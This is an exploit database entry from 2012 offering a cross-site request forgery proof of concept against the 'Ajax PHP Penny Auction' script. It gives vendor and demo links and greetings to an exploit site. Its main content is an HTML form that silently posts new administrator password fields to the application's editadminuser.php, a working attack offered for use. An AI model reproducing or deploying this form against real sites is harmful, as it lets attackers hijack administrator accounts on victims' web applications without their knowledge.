Ajax PHP Penny Auction CSRF



EKU-ID: 1660 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Ajax PHP Penny Auction CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/ajax-php-penny-auction-script-software/28039/
# Category::  webapps
# Demo : http://www.vdsdemoajaxphppennyauction.com/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form method="POST" action="target.com/[PATH]/editadminuser.php" name="conf">
<input type="hidden" size="25" name="newpassword"/>                
<input type="hidden" size="25" name="retrynewpassword"/>
<input type="submit" class="action" value="Speichern Sie die änderungen" name="act"/>
</form>